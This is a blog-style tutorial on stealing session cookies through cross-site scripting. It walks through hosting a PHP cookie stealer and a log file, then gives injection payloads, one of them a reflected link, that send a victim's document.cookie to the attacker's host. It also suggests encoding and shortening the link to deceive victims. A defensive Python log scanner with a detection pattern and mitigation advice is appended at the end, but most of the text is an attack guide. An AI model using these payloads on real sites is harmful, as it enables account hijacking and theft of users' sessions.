Cookie Stealing From Cross-Site Scripting (XSS) Attack
Hello guys. In this post I will show you cookie stealing from a cross-site scripting (XSS) attack: how an attacker can steal cookies from users. I hope you are familiar with XSS; if not, please read our basic XSS tutorial.
- Cookie stealer code: get it from here.
- Free web hosting.
- Basic knowledge of XSS attacks.
Cookie stealing is the process in which an attacker exploits an XSS vulnerability and steals the cookies of a victim who visits the infected link. These cookies are then used to compromise the victim's account.
Creating PHP Cookie Stealer
- Copy the cookie stealer code from here.
- Open Notepad or any editor and paste the code.
- Save the file with a .php extension. Example: xss.php
Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name given in the PHP file.
Now we have Two Files : 1) xss.php
Hosting Cookie Stealer and Log file
Now we have to host both files. For hosting you can use free web hosting, or you can use secure tunnelling. After hosting, the stealer will be at: www.domain.com/xss.php
Cookie Stealing From Cross-Site Scripting (XSS) Attack
Now that everything is set up, we have to find a vulnerable website in which to inject our malicious code.
<script>location.href = ‘http://www.site.com/xss.php?cookie=’+document.cookie;</script>
Cookie Stealing with Stored vs Reflected XSS:
Stored: if this code is injected into a site vulnerable to persistent XSS, it stays there until an admin finds it. It is shown to all users, so attackers don't need to send a link to anyone. Whoever visits the page becomes a victim.
Reflected: in the case of a non-persistent attack, the attacker sends the link to victims. Whenever they follow the link, it steals the cookie. Most sites are vulnerable to reflected XSS.
In reflected XSS, attackers send the injected link to victims.
hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = ‘http://www.Yoursite.com/Stealer.php?cookie=’+document.cookie;</script>
The above link clearly shows the script. An attacker can URL-encode the script, shorten the link with a URL-shortening service such as TinyURL, and then send it to the victim.
Once the victim opens the link, his/her cookie is stored in the log.txt file.
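From the defender's side, the reflected link described above still arrives at the vulnerable site with the script inside a query parameter, whether or not it was URL-encoded or hidden behind a shortener. The following added example (not part of the original post; the log lines, host names and function names are constructed for illustration) decodes each parameter repeatedly and flags requests that carry a script tag together with a `document.cookie` reference.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines (documentation IPs, made-up hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?search=shoes HTTP/1.1" 200 512',
    '203.0.113.8 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?search=%3Cscript%3Elocation.href'
    '%3D%27http%3A%2F%2Fcollector.example.test%2Fx%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E'
    ' HTTP/1.1" 200 640',
    # Double-encoded variant: one decoding pass is not enough to reveal it.
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?search=%253Cscript%253E'
    'document.cookie%253C%252Fscript%253E HTTP/1.1" 200 640',
    '203.0.113.10 - - [01/Jan/2024:10:00:12 +0000] "GET /help.php?topic=how+to+clear+a+cookie HTTP/1.1" 200 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Only the pattern shown on this page: a script tag that reads document.cookie.
SCRIPT_RE = re.compile(r'<\s*script\b', re.I)
COOKIE_RE = re.compile(r'document\s*\.\s*cookie', re.I)


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so nested encoding does not hide the payload."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return names of query parameters that look like cookie-stealing XSS."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []  # not a request line we understand
    hits = []
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        decoded = fully_decode(value)
        if SCRIPT_RE.search(decoded) and COOKIE_RE.search(decoded):
            hits.append(name)
    return hits


def scan(lines):
    """Return (client_ip, [parameter names]) for every flagged line."""
    return [(line.split()[0], hits) for line in lines if (hits := suspicious_params(line))]


if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(f"possible reflected XSS from {ip} in parameter(s): {', '.join(params)}")
```

A hit identifies which parameter the site reflects without encoding; the fix belongs there (HTML-escape the value on output), and marking session cookies `HttpOnly` keeps them out of `document.cookie` altogether.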